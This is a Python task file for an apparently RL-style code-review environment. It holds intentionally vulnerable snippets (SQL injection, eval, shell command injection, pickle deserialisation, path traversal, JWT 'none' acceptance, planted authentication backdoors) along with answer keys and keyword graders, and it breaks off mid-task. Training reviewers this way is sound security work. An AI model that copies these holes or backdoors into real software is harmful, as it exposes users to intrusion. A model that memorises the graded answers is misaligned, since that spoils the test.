PRobe / environment /tasks.py
Thakur, Mahipal
refactor: remove legacy architecture, promote clean structure to repo root
85fab7b
"""
Task definitions for the PRobe environment.
Six tasks across four difficulty tiers. Each task defines:
- code: Python source to review
- issues: list of ground-truth issues with grading metadata
- correct_decision: expected final review decision
Difficulty ladder:
0 ultra-easy β€” hints embedded in comments; bootstraps GRPO positive trajectories
1 easy β€” 3 clean logic bugs, no hints
2 medium β€” 5 security issues in an auth module
3 hard β€” 7 mixed issues in a data pipeline
4 medium β€” 5 async concurrency bugs
5 hard β€” 6 Flask API security issues
"""
from typing import Any
TASKS: list[dict[str, Any]] = [
# ── Task 0: Ultra-easy (bootstrap) ───────────────────────────────────────
# DESIGN INTENT: both issues have their category name spelled out in a code
# comment directly above them. A frozen weak model that simply reads the
# comments and echoes them back should reliably score > 0. This task exists
# solely to guarantee that GRPO has at least a few positive trajectories from
# training step 1.
{
"id": 0,
"name": "Bootstrap: Obvious Issues",
"difficulty": "ultra-easy",
"file_name": "bootstrap.py",
"description": (
"Review this short Python module. "
"The comments above each function hint at the kind of issue present. "
"Add a comment for each bug you find (line number, severity, category), "
"call request_changes, then submit."
),
"max_steps": 6,
"code": """\
# BUG: this loop has an off-by-one error β€” it iterates one index too far
def sum_items(data):
total = 0
for i in range(len(data) + 1): # line 4: causes IndexError on last iteration
total += data[i]
return total
# SECURITY: hardcoded credential β€” move to environment variable
def connect_db():
db_password = "s3cr3t_prod_pw" # line 11: hardcoded credential in source
return f"postgresql://admin:{db_password}@localhost/mydb"
""",
"issues": [
{
"id": "bootstrap_off_by_one",
"description": "Off-by-one: range(len+1) causes IndexError on the last iteration",
"line_range": (4, 4),
"keywords": [
"off-by-one", "off by one", "bug", "index", "indexerror",
"range", "+ 1", "len + 1", "out of bounds",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "bootstrap_hardcoded_cred",
"description": "Hardcoded password in source should be an environment variable",
"line_range": (11, 11),
"keywords": [
"hardcoded", "hard-coded", "security", "credential", "password",
"secret", "env", "environment variable", "os.environ",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
},
# ── Task 1: Easy ─────────────────────────────────────────────────────────
{
"id": 1,
"name": "Basic Bug Detection",
"difficulty": "easy",
"file_name": "utils.py",
"description": (
"Review this Python utility module. "
"Identify any bugs, logical errors, or code quality issues. "
"Add a comment for each issue you find (include line number, severity, "
"and category), then submit your review."
),
"max_steps": 15,
"code": """\
def calculate_average(numbers):
\"\"\"Calculate the average of a list of numbers.\"\"\"
total = 0
for i in range(len(numbers) + 1): # line 4
total += numbers[i]
average = total / len(numbers)
unused_result = sorted(numbers) # line 7
return average
def find_max(items):
\"\"\"Return the maximum value in a list.\"\"\"
if len(items) == 0:
return None
max_val = items[0]
for item in items:
if item > max_val:
max_val == item # line 17: should be =, not ==
return max_val
def is_palindrome(s):
\"\"\"Check if a string is a palindrome.\"\"\"
return s == s[::-1]
""",
"issues": [
{
"id": "off_by_one",
"description": "Off-by-one: range(len+1) causes IndexError on the last iteration",
"line_range": (4, 5),
"keywords": [
"off-by-one", "off by one", "range", "index", "indexerror",
"out of bounds", "len + 1", "+ 1", "index out",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "unused_variable",
"description": "unused_result is assigned but never used",
"line_range": (7, 7),
"keywords": [
"unused", "unused_result", "never used", "dead code",
"not used", "unnecessary",
],
"category": "style",
"severity": "info",
"weight": 0.5,
},
{
"id": "assignment_not_update",
"description": "max_val == item uses == (comparison) instead of = (assignment); max is never updated",
"line_range": (17, 17),
"keywords": [
"==", "assignment", "comparison", "max_val", "never update",
"not updating", "wrong operator", "should be =", "max never",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
},
# ── Task 2: Medium ───────────────────────────────────────────────────────
{
"id": 2,
"name": "Security Vulnerability Review",
"difficulty": "medium",
"file_name": "auth.py",
"description": (
"Review this authentication module for security vulnerabilities. "
"Pay careful attention to credential handling, input sanitization, "
"and cryptographic choices. Annotate every issue with its severity "
"and category, then submit your review."
),
"max_steps": 20,
"code": """\
import sqlite3
import hashlib
import os
DB_PASSWORD = "super_secret_123" # line 5
ADMIN_TOKEN = "tok_admin_abc123" # line 6
def authenticate_user(username, password):
\"\"\"Authenticate a user against the database.\"\"\"
conn = sqlite3.connect('app.db')
cursor = conn.cursor()
# line 12: f-string interpolation β†’ SQL injection
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
cursor.execute(query)
user = cursor.fetchone()
conn.close()
return user is not None
def hash_password(password):
\"\"\"Hash a password for storage.\"\"\"
return hashlib.md5(password.encode()).hexdigest() # line 21
def execute_admin_command(command):
\"\"\"Execute an admin maintenance command.\"\"\"
result = eval(command) # line 25
return result
def get_user_data(user_id):
\"\"\"Fetch user profile from internal service.\"\"\"
import requests
url = f"https://internal-api/users/{user_id}"
response = requests.get(url, verify=False) # line 32
return response.json()
""",
"issues": [
{
"id": "hardcoded_credentials",
"description": "Credentials hard-coded in source (lines 5-6)",
"line_range": (5, 6),
"keywords": [
"hardcoded", "hard-coded", "hard coded", "hardcode",
"db_password", "admin_token", "plaintext credential",
"environment variable", "env var", "os.environ",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "sql_injection",
"description": "SQL injection via unsanitised f-string interpolation",
"line_range": (12, 14),
"keywords": [
"sql injection", "sql", "injection", "f-string", "parameterized",
"sanitize", "escape", "prepared statement", "placeholder",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "weak_hashing",
"description": "MD5 is cryptographically broken for password storage",
"line_range": (21, 21),
"keywords": [
"md5", "weak", "bcrypt", "argon2", "pbkdf2", "scrypt",
"cryptographic", "password hashing", "hash", "broken",
],
"category": "security",
"severity": "error",
"weight": 0.75,
},
{
"id": "arbitrary_code_execution",
"description": "eval() on untrusted input allows arbitrary code execution",
"line_range": (25, 25),
"keywords": [
"eval", "arbitrary code", "code execution", "rce",
"remote code", "dangerous", "unsafe",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "ssl_verification_disabled",
"description": "verify=False disables TLS cert validation, enabling MITM attacks",
"line_range": (32, 32),
"keywords": [
"ssl", "verify", "certificate", "mitm",
"man-in-the-middle", "tls", "verify=false", "cert",
],
"category": "security",
"severity": "error",
"weight": 0.75,
},
],
"correct_decision": "request_changes",
},
# ── Task 3: Hard ─────────────────────────────────────────────────────────
{
"id": 3,
"name": "Full Architecture and Performance Review",
"difficulty": "hard",
"file_name": "data_pipeline.py",
"description": (
"Perform a comprehensive review of this data pipeline. "
"Identify bugs, security vulnerabilities, performance bottlenecks, "
"and architectural design issues. Each comment should clearly explain "
"the problem and suggest a fix. Submit your review when done."
),
"max_steps": 30,
"code": """\
import requests
import json
import time
from threading import Thread
API_KEY = "sk-prod-abc123def456" # line 6
class DataPipeline:
def __init__(self, endpoint):
self.endpoint = endpoint
self.results = []
self.cache = {} # line 13: unbounded
def fetch_batch(self, item_ids):
\"\"\"Fetch items from the API.\"\"\"
items = []
for item_id in item_ids: # line 17: N+1 pattern
response = requests.get(
f"{self.endpoint}/items/{item_id}",
headers={"Authorization": f"Bearer {API_KEY}"},
verify=False, # line 22
)
items.append(response.json())
return items
def process_items(self, items):
\"\"\"Transform items for storage.\"\"\"
results = []
for i in range(len(items)): # line 28: use enumerate
item = items[i]
transformed = {
"id": item["id"], # line 31: KeyError not handled
"value": item["value"] * 2,
"label": item.get("label", "unknown"),
}
results.append(transformed)
self.cache[item["id"]] = transformed # line 36
return results
def run_async(self, func, *args):
\"\"\"Run function in a background thread.\"\"\"
t = Thread(target=func, args=args)
t.start()
# line 43: thread not tracked or joined β€” resource leak
def save_results(self, results, output_path):
\"\"\"Persist results to disk.\"\"\"
with open(output_path, "w") as f:
json.dump(results, f)
def retry_failed(self, failed_ids, max_retries=10): # line 50
\"\"\"Re-fetch items that previously failed.\"\"\"
for item_id in failed_ids:
for attempt in range(max_retries):
try:
result = requests.get(
f"{self.endpoint}/items/{item_id}"
)
if result.status_code == 200:
self.results.append(result.json())
break
except Exception:
time.sleep(1) # line 60: no exponential backoff
""",
"issues": [
{
"id": "hardcoded_api_key",
"description": "API key hard-coded in source instead of an environment variable",
"line_range": (6, 6),
"keywords": [
"hardcoded", "hard-coded", "hardcode", "api key", "api_key",
"environment variable", "env var", "os.environ", "sk-prod",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Reveals batch endpoint docs β€” shows N+1 was also avoidable
"unlocks": "api_docs_hint",
},
{
"id": "n_plus_one_requests",
"description": "One HTTP request per item (N+1 pattern); should use a bulk/batch endpoint",
"line_range": (17, 24),
"keywords": [
"n+1", "n plus 1", "batch", "bulk", "loop",
"individual request", "serial", "one request per",
],
"category": "performance",
"severity": "error",
"weight": 1.0,
},
{
"id": "ssl_disabled",
"description": "SSL certificate verification disabled (verify=False)",
"line_range": (22, 22),
"keywords": [
"ssl", "verify", "certificate", "tls",
"mitm", "verify=false", "cert",
],
"category": "security",
"severity": "error",
"weight": 0.75,
# Reveals network topology β€” confirms direct internet exposure
"unlocks": "network_topology_hint",
},
{
"id": "missing_key_error_handling",
"description": "Direct dict access item['id'] / item['value'] raises KeyError on unexpected payloads",
"line_range": (31, 32),
"keywords": [
"keyerror", "key error", "error handling", "missing key",
"exception", "try", ".get(", "dict access",
],
"category": "bug",
"severity": "warning",
"weight": 0.75,
},
{
"id": "unbounded_cache",
"description": "self.cache grows without bound; will cause OOM on large inputs",
"line_range": (13, 13),
"keywords": [
"unbounded", "memory leak", "cache size", "limit",
"lru", "eviction", "grow", "oom", "memory",
],
"category": "design",
"severity": "warning",
"weight": 0.75,
},
{
"id": "thread_not_joined",
"description": "Thread is started but never stored or joined β€” silent resource/exception leak",
"line_range": (40, 43),
"keywords": [
"thread", "join", "track", "resource leak",
"daemon", "not joined", "not tracked",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "no_exponential_backoff",
"description": "Retry loop sleeps 1 s flat; needs exponential backoff to avoid hammering the API",
"line_range": (50, 60),
"keywords": [
"backoff", "exponential", "retry", "sleep", "rate limit",
"jitter", "aggressive",
],
"category": "design",
"severity": "warning",
"weight": 0.5,
},
],
"correct_decision": "request_changes",
# ── Causal context hints ──────────────────────────────────────────
# Finding the hardcoded API key reveals the upstream API docs, showing
# a bulk endpoint exists β€” making the N+1 pattern even more damning.
# Finding the SSL issue reveals the network topology, confirming the
# service is directly internet-facing with no TLS termination proxy.
"context_hints": {
"api_docs_hint": (
"=== UNLOCKED: Upstream API Documentation (excerpt) ===\n"
" GET /items/{id} β€” fetch a single item\n"
" POST /items/batch β€” fetch up to 500 items in one request\n"
" body: {\"ids\": [1, 2, ...]}\n"
"NOTE: A batch endpoint already exists. The current code issues one\n"
"request per item instead of using /items/batch, amplifying the\n"
"credential-exposure risk: every request carries the leaked API_KEY."
),
"network_topology_hint": (
"=== UNLOCKED: Deployment Network Map ===\n"
" Internet β†’ DataPipeline service (no TLS proxy) β†’ upstream API\n"
" The DataPipeline pod has a public IP and no WAF in front of it.\n"
"NOTE: verify=False combined with direct internet exposure means\n"
"any network path between the pod and the upstream API is vulnerable\n"
"to a man-in-the-middle attack with no detection mechanism."
),
},
},
# ── Task 4: Medium β€” Async Concurrency ───────────────────────────────
{
"id": 4,
"name": "Async Worker Review",
"difficulty": "medium",
"file_name": "async_worker.py",
"description": (
"Review this async worker module for concurrency bugs, "
"resource leaks, and exception-handling problems. "
"Comment on every issue with its line number, severity, "
"and category, then submit your review."
),
"max_steps": 20,
"code": """\
import asyncio
import aiohttp
_counter = 0 # line 3: shared mutable state, not thread/task-safe
async def fetch_url(url: str) -> dict:
\"\"\"Fetch a URL and return JSON.\"\"\"
session = aiohttp.ClientSession() # line 7: session never closed β†’ resource leak
async with session.get(url) as resp:
return await resp.json()
async def increment_and_fetch(url: str) -> dict:
\"\"\"Increment shared counter then fetch.\"\"\"
global _counter
_counter += 1 # line 15: race condition β€” not atomic in concurrent tasks
data = fetch_url(url) # line 16: missing await β†’ returns coroutine, not result
return data
async def run_all(urls: list) -> list:
\"\"\"Run all fetches concurrently.\"\"\"
tasks = [increment_and_fetch(u) for u in urls]
results = []
for coro in tasks:
try:
result = await coro
results.append(result)
except Exception:
pass # line 27: swallows all exceptions silently
return results
async def retry_fetch(url: str, retries: int = 3) -> dict:
\"\"\"Fetch with retry logic.\"\"\"
for attempt in range(retries):
try:
return await fetch_url(url)
except Exception as e:
if attempt == retries - 1:
raise
await asyncio.sleep(1) # line 38: flat sleep, no exponential backoff
""",
"issues": [
{
"id": "shared_mutable_state",
"description": "Module-level _counter mutated by concurrent tasks without a lock",
"line_range": (3, 3),
"keywords": [
"shared", "race condition", "thread-safe", "task-safe",
"atomic", "lock", "asyncio.lock", "concurrent", "global",
"mutable", "not safe",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "unclosed_session",
"description": "aiohttp.ClientSession created inside function is never closed β†’ resource leak",
"line_range": (7, 9),
"keywords": [
"session", "not closed", "resource leak", "close", "context manager",
"async with", "clientsession", "leak", "aiohttp",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "missing_await",
"description": "fetch_url(url) called without await β€” returns unawaited coroutine",
"line_range": (16, 16),
"keywords": [
"await", "missing await", "coroutine", "not awaited", "unawaited",
"returns coroutine",
],
"category": "bug",
"severity": "critical",
"weight": 1.0,
},
{
"id": "silent_exception",
"description": "bare except: pass swallows all exceptions, hiding errors",
"line_range": (27, 27),
"keywords": [
"swallow", "silent", "bare except", "exception", "pass",
"ignore", "hidden", "suppress", "logging",
],
"category": "design",
"severity": "warning",
"weight": 0.75,
},
{
"id": "no_backoff",
"description": "Retry sleep is flat 1 s; should use exponential backoff with jitter",
"line_range": (38, 38),
"keywords": [
"backoff", "exponential", "jitter", "retry", "sleep",
"flat", "rate limit",
],
"category": "design",
"severity": "warning",
"weight": 0.5,
},
],
"correct_decision": "request_changes",
},
# ── Task 5: Hard β€” Flask API Vulnerabilities ──────────────────────────
{
"id": 5,
"name": "Flask API Security Review",
"difficulty": "hard",
"file_name": "api_server.py",
"description": (
"Perform a thorough security review of this Flask REST API. "
"Look for injection flaws, path traversal, insecure deserialization, "
"sensitive data exposure, and missing access controls. "
"Comment on every issue, then submit your review."
),
"max_steps": 30,
"code": """\
import os
import pickle
import subprocess
import logging
from flask import Flask, request, jsonify, send_file
app = Flask(__name__)
SECRET_KEY = "flask-secret-hardcoded" # line 8
logging.basicConfig(level=logging.DEBUG)
@app.route("/run", methods=["POST"])
def run_command():
\"\"\"Run a system command and return output.\"\"\"
cmd = request.json.get("command", "")
# line 15: unsanitised shell command β†’ OS command injection
result = subprocess.check_output(cmd, shell=True, text=True)
return jsonify({"output": result})
@app.route("/files", methods=["GET"])
def get_file():
\"\"\"Serve a file from the data directory.\"\"\"
filename = request.args.get("name", "")
# line 23: no path normalisation β†’ path traversal
path = os.path.join("/app/data", filename)
return send_file(path)
@app.route("/load", methods=["POST"])
def load_object():
\"\"\"Deserialise a user-supplied payload.\"\"\"
data = request.get_data()
# line 30: pickle.loads on untrusted data β†’ arbitrary code execution
obj = pickle.loads(data)
return jsonify({"type": str(type(obj))})
@app.route("/login", methods=["POST"])
def login():
\"\"\"Authenticate and return a token.\"\"\"
username = request.json.get("username")
password = request.json.get("password")
# line 38: credentials logged at DEBUG level
logging.debug(f"Login attempt: username={username} password={password}")
if username == "admin" and password == SECRET_KEY:
return jsonify({"token": SECRET_KEY}) # line 41: secret returned in response
return jsonify({"error": "unauthorized"}), 401
@app.route("/admin", methods=["GET"])
def admin_panel():
\"\"\"Return admin data β€” no auth check.\"\"\"
# line 47: no authentication or authorisation check
return jsonify({"users": ["alice", "bob", "admin"], "config": {"debug": True}})
""",
"issues": [
{
"id": "hardcoded_secret",
"description": "Flask SECRET_KEY hard-coded in source; should come from env var",
"line_range": (8, 8),
"keywords": [
"hardcoded", "hard-coded", "secret_key", "environment variable",
"env var", "os.environ", "secret", "hardcode",
],
"category": "security",
"severity": "critical",
"weight": 0.75,
},
{
"id": "command_injection",
"description": "subprocess.check_output with shell=True and unsanitised user input β†’ OS command injection",
"line_range": (15, 16),
"keywords": [
"command injection", "shell injection", "shell=true", "subprocess",
"os injection", "arbitrary command", "unsanitised", "sanitize",
"injection",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Reveals server deployment config β€” shows shell access = full host compromise
"unlocks": "server_config_hint",
},
{
"id": "path_traversal",
"description": "No path normalisation allows ../../../etc/passwd-style traversal",
"line_range": (23, 24),
"keywords": [
"path traversal", "directory traversal", "path normaliz",
"os.path.abspath", "realpath", "../", "dot dot",
"escape", "filename", "traversal",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "insecure_deserialization",
"description": "pickle.loads on untrusted user data allows arbitrary code execution",
"line_range": (30, 31),
"keywords": [
"pickle", "deserialization", "deserialisation", "arbitrary code",
"untrusted", "rce", "remote code", "insecure deserialization",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Reveals client usage pattern β€” shows external clients send pickle payloads
"unlocks": "client_usage_hint",
},
{
"id": "credentials_in_logs",
"description": "Plaintext username and password written to DEBUG log",
"line_range": (38, 38),
"keywords": [
"log", "logging", "credential", "password", "sensitive",
"plaintext", "debug", "leak", "exposure",
],
"category": "security",
"severity": "error",
"weight": 0.75,
},
{
"id": "missing_auth_check",
"description": "Admin endpoint has no authentication or authorisation guard",
"line_range": (47, 47),
"keywords": [
"auth", "authentication", "authorization", "authorisation",
"access control", "no check", "unprotected", "unauthenticated",
"missing auth",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
# ── Causal context hints ──────────────────────────────────────────
# Finding command_injection reveals the host deployment context,
# escalating severity from "code bug" to "full host compromise".
# Finding insecure_deserialization reveals client usage patterns,
# confirming the /load endpoint is actively used by external scripts.
"context_hints": {
"server_config_hint": (
"=== UNLOCKED: Server Deployment Configuration ===\n"
" The Flask app runs as root inside a Docker container with:\n"
" --privileged flag set\n"
" host network mode (--network=host)\n"
" /var/run/docker.sock mounted read-write\n"
"NOTE: Command injection on this host is not just a container escape β€”\n"
"the app runs as root with Docker socket access, giving an attacker\n"
"full control of the host and all sibling containers."
),
"client_usage_hint": (
"=== UNLOCKED: Client Integration Pattern (from internal wiki) ===\n"
" # Example client code used by 3 internal services:\n"
" import pickle, requests\n"
" payload = pickle.dumps(MyObject(user_input))\n"
" requests.post('https://api.internal/load', data=payload)\n"
"NOTE: At least 3 internal services send user-controlled pickle\n"
"payloads to /load. Any of those services being compromised allows\n"
"a lateral-movement RCE attack through this endpoint."
),
},
},
# ── Task 6: Causal Chain β€” Secrets Leak Investigation ────────────────────
#
# WORLD-MODELING DESIGN
# ─────────────────────
# This task implements a *causal observation chain*:
#
# Phase 1 (lines visible from the start)
# The agent sees a Flask service with two obvious surface issues.
# Finding issue A (hardcoded JWT secret) *unlocks* Phase 2 context.
#
# Phase 2 (revealed after issue A is found)
# A hidden DB schema snippet is appended to the observation, exposing
# a privilege-escalation path that only makes sense once the secret
# leak is understood. This rewards genuine causal reasoning:
# "the leaked secret lets an attacker forge admin tokens β†’ they can
# reach the unguarded /admin/promote endpoint β†’ full privilege
# escalation."
#
# Phase 3 (revealed after issue B is found)
# After the agent flags the missing rate-limit, the server's nginx
# config fragment is revealed, showing that /auth is also missing
# the global IP-allowlist β€” confirming the attack surface is wider
# than the code alone suggests.
#
# The chained field `"unlocks"` in each issue entry names the context_key
# that the environment injects into the observation when that issue is found.
# The environment layer reads this and appends the hint to `context_hints`.
{
"id": 6,
"name": "Causal Secrets Leak Investigation",
"difficulty": "hard",
"file_name": "auth_service.py",
"description": (
"Review this authentication service carefully. "
"Some issues unlock additional context about the wider system β€” "
"read every new hint you receive before continuing. "
"Use get_context on any suspicious line to reveal surrounding detail. "
"Identify all issues, then submit your review."
),
"max_steps": 35,
"code": """\
import jwt
import sqlite3
import time
from flask import Flask, request, jsonify
app = Flask(__name__)
# ---- configuration ----------------------------------------------------------
JWT_SECRET = "super-secret-jwt-key-do-not-share" # line 9: hardcoded secret
JWT_ALGORITHM = "HS256"
# ---- helpers ----------------------------------------------------------------
def create_token(user_id: int, role: str) -> str:
payload = {
"sub": user_id,
"role": role,
"exp": time.time() + 3600,
}
return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM)
def verify_token(token: str) -> dict:
# line 23: algorithm not pinned β€” accepts ["none"] attack if lib < 2.0
return jwt.decode(token, JWT_SECRET, algorithms=["HS256", "none"])
# ---- routes -----------------------------------------------------------------
@app.route("/auth", methods=["POST"])
def authenticate():
\"\"\"Issue a JWT for valid credentials.\"\"\"
body = request.get_json(force=True)
uname = body.get("username", "")
pwd = body.get("password", "")
# line 33: no rate limiting β†’ brute-force possible
conn = sqlite3.connect("users.db")
cursor = conn.cursor()
# line 37: f-string SQL β†’ injection
cursor.execute(f"SELECT id, role FROM users WHERE username='{uname}' AND password='{pwd}'")
row = cursor.fetchone()
conn.close()
if row:
return jsonify({"token": create_token(row[0], row[1])})
return jsonify({"error": "invalid credentials"}), 401
@app.route("/admin/promote", methods=["POST"])
def promote_user():
\"\"\"Promote a user to admin β€” JWT required.\"\"\"
token = request.headers.get("Authorization", "").replace("Bearer ", "")
try:
claims = verify_token(token)
except Exception:
return jsonify({"error": "unauthorized"}), 401
# line 51: role taken directly from token β€” no DB re-validation
if claims.get("role") == "admin":
target = request.json.get("user_id")
conn = sqlite3.connect("users.db")
conn.execute(f"UPDATE users SET role='admin' WHERE id={target}") # line 55: injection
conn.commit()
conn.close()
return jsonify({"promoted": target})
return jsonify({"error": "forbidden"}), 403
""",
# ── Ground-truth issues ───────────────────────────────────────────
"issues": [
{
"id": "hardcoded_jwt_secret",
"description": "JWT_SECRET is hard-coded; anyone with source access can forge tokens",
"line_range": (9, 9),
"keywords": [
"hardcoded", "hard-coded", "jwt_secret", "secret", "jwt",
"environment variable", "env var", "os.environ", "forge",
"hardcode", "token secret",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Finding this issue unlocks the DB schema context hint
"unlocks": "db_schema_hint",
},
{
"id": "jwt_none_algorithm",
"description": (
"jwt.decode accepts 'none' algorithm β€” attacker can craft an "
"unsigned token and bypass signature verification"
),
"line_range": (23, 24),
"keywords": [
"none", "algorithm", "alg", "unsigned", "bypass",
"jwt", "signature", "verify", "none algorithm",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "no_rate_limit",
"description": "/auth endpoint has no rate limiting β€” susceptible to brute-force",
"line_range": (33, 34),
"keywords": [
"rate limit", "rate-limit", "brute force", "brute-force",
"throttle", "throttling", "flood", "limit", "attempts",
],
"category": "security",
"severity": "error",
"weight": 0.75,
# Finding this unlocks the nginx config hint
"unlocks": "nginx_config_hint",
},
{
"id": "sql_injection_auth",
"description": "f-string interpolation in SQL query on /auth β†’ injection",
"line_range": (37, 38),
"keywords": [
"sql injection", "sql", "injection", "f-string", "parameterized",
"sanitize", "escape", "prepared statement", "placeholder",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "role_from_token_only",
"description": (
"Role is read directly from the JWT payload without re-checking the DB β€” "
"a forged or stale token grants permanent privilege"
),
"line_range": (51, 52),
"keywords": [
"role", "token", "db", "database", "re-check", "revalidat",
"stale", "privilege", "escalation", "claims", "payload",
"not verified", "trust",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "sql_injection_promote",
"description": "f-string SQL in /admin/promote UPDATE query β†’ second-order injection",
"line_range": (55, 55),
"keywords": [
"sql injection", "sql", "injection", "f-string", "parameterized",
"prepared statement", "placeholder", "update", "second order",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
# ── Causal context hints β€” revealed progressively ─────────────────
# Each value is injected into the observation once the triggering
# issue is found. The agent must incorporate this new information
# into its ongoing world model.
"context_hints": {
"db_schema_hint": (
"=== UNLOCKED: Database Schema (users.db) ===\n"
" CREATE TABLE users (\n"
" id INTEGER PRIMARY KEY,\n"
" username TEXT UNIQUE NOT NULL,\n"
" password TEXT NOT NULL, -- stored as plaintext!\n"
" role TEXT DEFAULT 'viewer' -- 'viewer' | 'editor' | 'admin'\n"
" );\n"
"NOTE: The /admin/promote endpoint can elevate any user to 'admin'. "
"Combined with a forged JWT (from the leaked secret), an attacker "
"can reach this endpoint with admin claims and promote themselves."
),
"nginx_config_hint": (
"=== UNLOCKED: nginx reverse-proxy config (nginx.conf excerpt) ===\n"
" location /auth {\n"
" proxy_pass http://auth_service:5000;\n"
" # no ip_allowlist, no limit_req_zone\n"
" }\n"
"NOTE: The nginx layer adds no rate-limiting or IP filtering "
"in front of /auth, confirming the brute-force surface is "
"fully exposed to the internet."
),
},
},
# ── Task 7: Adversarial β€” Simple Obfuscated Backdoor ─────────────────────
#
# ADVERSARIAL DESIGN
# ──────────────────
# A malicious contributor submitted a "fix for timing issues" but embedded
# a deliberate backdoor: a hardcoded bypass credential that looks like a
# leftover debug constant, plus a subtle branch that lets any request with
# X-Debug-Token skip authentication entirely.
#
# The agent must:
# 1. Find the bypass credential AND the debug-token branch
# 2. Classify BOTH as intentional_backdoor (not accidental_bug)
# 3. Choose escalate_to_security_review (not request_changes)
#
# Partial credit: finding issues but misclassifying β†’ partial reward only
{
"id": 7,
"name": "Adversarial: Debug Bypass Backdoor",
"difficulty": "adversarial",
"file_name": "session_manager.py",
"description": (
"This PR was submitted by an external contributor as a 'timing fix'. "
"Review this session management module carefully. "
"Classify each issue as either 'accidental_bug' or 'intentional_backdoor'. "
"If you find evidence of a deliberate backdoor, escalate to security review "
"instead of requesting changes."
),
"max_steps": 25,
"escalation_required": True,
"code": """\
import hmac
import hashlib
import os
import time
# Timing-safe comparison helper added in this PR
_DEBUG_MASTER_KEY = "dbg-bypass-2024-xK9" # line 7: "leftover" debug constant
SESSION_TIMEOUT = 3600
def verify_session(token: str, stored_hash: str) -> bool:
\"\"\"Verify a session token using timing-safe comparison.\"\"\"
# line 13: debug bypass β€” any request with this key skips verification
if token == _DEBUG_MASTER_KEY:
return True
expected = hashlib.sha256(token.encode()).hexdigest()
return hmac.compare_digest(expected, stored_hash)
def create_session(user_id: int) -> dict:
\"\"\"Create a new session for a user.\"\"\"
token = os.urandom(32).hex()
return {
"user_id": user_id,
"token": token,
"expires_at": time.time() + SESSION_TIMEOUT,
"created_at": time.time(),
}
def is_expired(session: dict) -> bool:
\"\"\"Check if a session has expired.\"\"\"
return time.time() > session["expires_at"]
def refresh_session(session: dict) -> dict:
\"\"\"Extend session expiry if it is still valid.\"\"\"
if is_expired(session):
raise ValueError("Cannot refresh expired session")
session["expires_at"] = time.time() + SESSION_TIMEOUT
return session
""",
"issues": [
{
"id": "backdoor_master_key",
"description": (
"Hardcoded _DEBUG_MASTER_KEY is a deliberate backdoor credential "
"that bypasses all authentication β€” not a leftover debug constant"
),
"line_range": (7, 7),
"keywords": [
"hardcoded", "backdoor", "bypass", "master key", "debug key",
"intentional", "deliberate", "_debug_master_key", "secret",
"authentication bypass",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "git_blame_hint",
},
{
"id": "backdoor_bypass_branch",
"description": (
"The token == _DEBUG_MASTER_KEY branch unconditionally returns True, "
"granting any caller full session access without a valid token"
),
"line_range": (13, 15),
"keywords": [
"bypass", "backdoor", "unconditional", "always true", "skip",
"debug_master_key", "comparison", "authentication bypass",
"returns true", "branch",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
},
],
"correct_decision": "escalate_to_security_review",
"context_hints": {
"git_blame_hint": (
"=== UNLOCKED: Git Blame β€” session_manager.py line 7 ===\n"
" commit a3f9c12 (external-contributor, 3 days ago)\n"
" Author: pr-bot-4471 <noreply@external.io>\n"
" Message: 'fix: add timing-safe comparison, remove legacy debug artifacts'\n"
"\n"
"NOTE: The commit message claims to REMOVE debug artifacts, yet this\n"
"line was ADDED in this commit. The contributor's account (pr-bot-4471)\n"
"was created 4 days ago and has no prior commit history in this org.\n"
"This strongly suggests the 'debug constant' was intentionally planted."
),
},
},
# ── Task 8: Adversarial β€” Compound Backdoor (JWT + Timing Oracle) ─────────
#
# ADVERSARIAL DESIGN
# ──────────────────
# The PR claims to "harden JWT validation". In reality it introduces TWO
# coordinated backdoor components that are only dangerous together:
# Component A (line 12): weakens the HMAC secret to a known value
# Component B (line 34): introduces a timing oracle via non-constant-time compare
#
# Neither component alone is immediately catastrophic, but together they allow
# an attacker to: (1) use the known weak secret to forge a valid JWT,
# then (2) use the timing oracle to confirm which tokens are accepted,
# enabling account takeover without any brute-force detection.
#
# This is the hardest adversarial task β€” requires multi-step causal reasoning.
{
"id": 8,
"name": "Adversarial: Compound Backdoor (JWT Hardening PR)",
"difficulty": "adversarial",
"file_name": "jwt_validator.py",
"description": (
"This PR was submitted as a 'JWT validation hardening'. "
"Review the changes carefully. Some issues may only be dangerous in combination. "
"Use get_context to investigate suspicious lines before commenting. "
"Classify each issue as 'accidental_bug' or 'intentional_backdoor'. "
"Escalate to security review if you find coordinated backdoor components."
),
"max_steps": 35,
"escalation_required": True,
"code": """\
import jwt
import hmac
import hashlib
import time
# PR description: 'Harden JWT validation β€” use deterministic secret derivation'
# line 7: secret derived from a fixed seed β€” looks like a 'standardisation' change
JWT_SECRET = hashlib.md5(b"internal-seed-v1").hexdigest() # line 7
SUPPORTED_ALGORITHMS = ["HS256"]
TOKEN_EXPIRY = 3600
def create_token(user_id: int, role: str) -> str:
\"\"\"Create a signed JWT for the given user.\"\"\"
payload = {
"sub": user_id,
